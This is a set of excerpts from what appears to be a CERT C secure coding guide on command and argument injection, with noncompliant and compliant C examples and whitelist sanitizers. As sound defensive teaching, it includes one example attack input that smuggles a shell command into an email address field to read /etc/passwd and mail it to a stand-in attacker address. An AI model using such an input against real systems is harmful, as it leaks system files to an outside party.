...

  • command processor via a call to system() or similar function (also addressed in recommendation ENV03-C. Sanitize the environment when invoking external programs)
  • external programs
  • relational databases
  • third-party commercial off-the-shelf (COTS) components (for example, an enterprise resource planning subsystem)

...

/* Noncompliant: addr comes straight from the user and is spliced into a
 * command line that system() hands to the shell, so shell metacharacters
 * in addr are interpreted. */
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);

The risk is, of course, that the user enters the following string as an email address:

bogus@addr.com; cat /etc/passwd  | mail some@badguy.net

For more info on the system() call, see recommendations ENV03-C. Sanitize the environment when invoking external programs and ENV04-C. Do not call system() if you do not need a command processor.

...

It is necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, whitelisting can be used to eliminate dangerous characters from the data.

The whitelisting approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. This example, based on the tcp_wrappers package written by Wietse Venema, shows the whitelisting approach.

#include <string.h>

/* Every character not in this set is replaced; note that the
 * replacement character '_' is itself in the set, which is what
 * lets the loop below advance past characters it has rewritten. */
static char ok_chars[] = "abcdefghijklmnopqrstuvwxyz"
                         "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                         "1234567890_-.@";
char user_data[] = "Bad char 1:} Bad char 2:{";
char *cp = user_data; /* cursor into string */
const char *end = user_data + strlen(user_data);
/* strspn() skips the run of acceptable characters; the loop stops on
 * each unacceptable one and overwrites it. */
for (cp += strspn(cp, ok_chars); cp != end; cp += strspn(cp, ok_chars)) {
  *cp = '_';
}

The benefit of whitelisting is that a programmer can be certain that a string contains only characters that the programmer considers safe. Whitelisting is recommended over blacklisting, which traps all unacceptable characters, because the programmer only needs to ensure that acceptable characters are identified. As a result, the programmer can be less concerned about which characters an attacker may try in an attempt to bypass security checks.

...

/* Noncompliant: the value of USER is passed directly after the options,
 * so a value beginning with '-' is parsed by login as another option. */
(void) execl(LOGIN_PROGRAM, "login",
  "-p",
  "-d", slavename,
  "-h", host,
  "-s", pam_svc_name,
  (AuthenticatingUser != NULL ? AuthenticatingUser :
  getenv("USER")),
  (char *)0); /* the argument list must end with a null pointer, not int 0 */

An attacker, in this case, can gain unauthenticated access to a system by setting the USER environment variable to a string that the login program interprets as an additional command-line option. This kind of attack is called an argument injection attack.

Compliant Solution

The following compliant solution inserts the "--" argument before the call to getenv("USER") in the call to execl():

/* Compliant: "--" ends option parsing, so whatever follows is treated as
 * an operand even if it begins with '-'. */
(void) execl(LOGIN_PROGRAM, "login",
  "-p",
  "-d", slavename,
  "-h", host,
  "-s", pam_svc_name,
  "--",
  (AuthenticatingUser != NULL ? AuthenticatingUser :
  getenv("USER")), (char *)0);

...

The call to execl() is not susceptible to command injection because the shell command interpreter is not invoked. (See recommendation ENV04-C. Do not call system() if you do not need a command processor.)
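The two ideas on this page, whitelisting the data and avoiding the shell entirely, combine naturally. The added example below (not part of the original page or tcp_wrappers) generalizes the page's whitelist loop into a reusable function that also reports how much it had to rewrite, and replaces the sprintf()+system() mail invocation with a direct execv() whose argument vector carries the "--" separator. The address whitelist, the program path /bin/mail and the argument layout are assumptions for illustration; unlike the page's loop, the sanitizer does not rely on the replacement character being whitelisted.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Same acceptable set as the page's example. */
static const char OK_CHARS[] =
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "1234567890_-.@";

/* Whitelist sanitizer: overwrite every byte of s that is not in ok with
 * repl and return how many bytes were changed. The cursor is advanced by
 * one after each rewrite, so the loop terminates even when repl itself
 * is not in ok (the page's loop depends on '_' being whitelisted). */
size_t sanitize_whitelist(char *s, const char *ok, char repl) {
  size_t replaced = 0;
  for (char *cp = s + strspn(s, ok); *cp != '\0'; cp += strspn(cp, ok)) {
    *cp++ = repl;
    replaced++;
  }
  return replaced;
}

/* Strict form: true only if every byte of s is whitelisted. Rejecting is
 * preferable to rewriting when the data is an identifier like an address. */
bool is_clean(const char *s, const char *ok) {
  return s[0] != '\0' && s[strspn(s, ok)] == '\0';
}

/* Build an argument vector for /bin/mail (assumed path) with no shell in
 * the way. "--" ends option parsing, so an address starting with '-'
 * cannot be read as an option. argv must have room for 4 entries. */
bool build_mail_argv(const char *addr, const char *argv[4]) {
  if (!is_clean(addr, OK_CHARS)) return false; /* reject, do not repair */
  argv[0] = "/bin/mail";
  argv[1] = "--";
  argv[2] = addr;
  argv[3] = NULL;
  return true;
}

/* Replacement for sprintf()+system(): exec the program directly. The
 * caller (typically a forked child) redirects stdin from the message
 * file itself; that redirection is the part system() delegated to the
 * shell. Returns -1 if the address was rejected or execv() failed. */
int run_mail(const char *addr) {
  const char *argv[4];
  if (!build_mail_argv(addr, argv)) return -1;
  execv(argv[0], (char *const *)argv);
  return -1; /* only reached when execv() fails */
}
```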

...

Tool        | Version    | Checker                              | Description
Fortify SCA | 5.0        |                                      |
Klocwork    | Klocwork_V | NNTS.TAINTED, SV.TAINTED.INJECTION   |

Related Vulnerabilities

Search for vulnerabilities resulting from the violation of this rule on the CERT website.

...

MITRE CWE: CWE-88, "Argument injection or modification"

MITRE CWE: CWE-78, "Failure to sanitize data into an OS command (aka 'OS command injection')"

ISO/IEC 9899:2011 Section 7.22.4.8, "The system function"

Bibliography

...